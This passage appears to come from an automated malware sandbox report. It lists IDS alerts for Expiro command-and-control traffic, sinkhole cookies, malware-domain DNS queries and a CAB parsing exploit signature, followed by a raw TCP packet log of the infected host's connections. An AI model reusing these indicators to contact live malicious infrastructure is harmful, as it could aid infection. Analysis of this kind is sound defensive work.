                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:27.269331+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.559550TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:34.829754+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.559592TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:34.829754+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.559592TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:35.730953+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.559599TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:35.730953+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.559599TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:42.742917+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.559640TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:53.102955+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.559724TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:53.102955+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.559724TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:00.505646+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55975118.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:01.083801+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.559752TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:01.083801+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.559752TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:02.298627+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.559754TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:02.298627+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.559754TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:23.874141+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.5549961.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:26.438965+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.5562571.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:04:48.309363+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.5562791.1.1.153UDP

                                                                                                                                                                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.883618116 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.883680105 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.883758068 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.908616066 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:50.908652067 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.130961895 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.135879040 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.136076927 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.136552095 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.136552095 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.141372919 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.141722918 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.760377884 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.760445118 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.765227079 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.765249014 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.765571117 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.809597969 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.919873953 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.967333078 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.982191086 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.989878893 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.995548964 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:51.995609045 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.025841951 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.030837059 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.030899048 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.034046888 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.034073114 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.038883924 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.038988113 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.044861078 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.049777985 CET804970754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.049879074 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.050487995 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.050487995 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.055362940 CET804970754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.055473089 CET804970754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.100807905 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.100883007 CET44349704172.67.74.152192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.100955009 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.106276035 CET49704443192.168.2.5172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.558911085 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.563884974 CET204949708212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.565356016 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.574569941 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.579363108 CET204949708212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.881268024 CET804970754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.885867119 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.891374111 CET804970754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:52.891897917 CET4970780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.054061890 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.057914972 CET204949708212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.058182955 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.059041977 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.059536934 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.067039013 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.067274094 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.072017908 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.072087049 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.265121937 CET497082049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.504396915 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.515320063 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.521181107 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.521245003 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.746259928 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.751439095 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.751625061 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.772322893 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.772322893 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.777313948 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:53.777328968 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.491164923 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.502829075 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.507719040 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.507874012 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.526206970 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.531476974 CET804970918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.531596899 CET4970980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.593645096 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.596106052 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.601386070 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.601525068 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.763011932 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.768091917 CET805938844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.768311977 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.776277065 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.776551962 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.781457901 CET805938844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.781635046 CET805938844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.116058111 CET5938880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.202234030 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.207536936 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.207632065 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.219504118 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.219504118 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.224365950 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.224401951 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.367278099 CET5939080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.372328997 CET805939054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.372415066 CET5939080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.373518944 CET5939080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.373532057 CET5939080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.378396988 CET805939054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.378503084 CET805939054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.403208017 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.403467894 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.408492088 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.647495985 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.647650957 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.652617931 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.878238916 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.891474962 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.894474983 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.899585009 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.912812948 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:55.914055109 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.031486034 CET5938980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.036477089 CET805938944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.081315041 CET5939180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.086473942 CET8059391172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.086570978 CET5939180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.091259003 CET5939180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.091412067 CET5939180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.096141100 CET8059391172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.096252918 CET8059391172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.144057989 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.144073963 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.144088030 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.144098043 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.144131899 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.217242002 CET805939054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.222570896 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.226798058 CET5939080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.227493048 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.232024908 CET805939054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.232109070 CET5939080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.372340918 CET5939280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.377392054 CET805939244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.377476931 CET5939280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.378994942 CET5939280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.379080057 CET5939280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.383819103 CET805939244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.383856058 CET805939244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.466556072 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.469086885 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.473929882 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.713000059 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.714153051 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.722534895 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.750453949 CET8059391172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.750540972 CET5939180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.750750065 CET5939180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.755549908 CET8059391172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.757864952 CET5939380192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.767025948 CET8059393172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.767172098 CET5939380192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.791968107 CET5939380192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.791968107 CET5939380192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.796849012 CET8059393172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.796860933 CET8059393172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.958017111 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.983091116 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.988039017 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.029869080 CET805939244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.030015945 CET5939280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.035218000 CET805939244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.035331964 CET5939280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.129640102 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.134555101 CET8059394172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.134634018 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.134841919 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.134864092 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.139626026 CET8059394172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.139640093 CET8059394172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.236079931 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.236342907 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.241229057 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.437916994 CET8059393172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.437980890 CET5939380192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.438159943 CET5939380192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.442976952 CET8059393172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.470896006 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.475780964 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.475872040 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.476269007 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.476289034 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.481069088 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.481081009 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.496409893 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.496640921 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.501636028 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.746264935 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.746464968 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.751627922 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.804547071 CET8059394172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.804634094 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.805068970 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.809864044 CET8059394172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.902299881 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.907303095 CET8059396172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.907440901 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.926479101 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.926534891 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.931390047 CET8059396172.234.222.138192.168.2.5
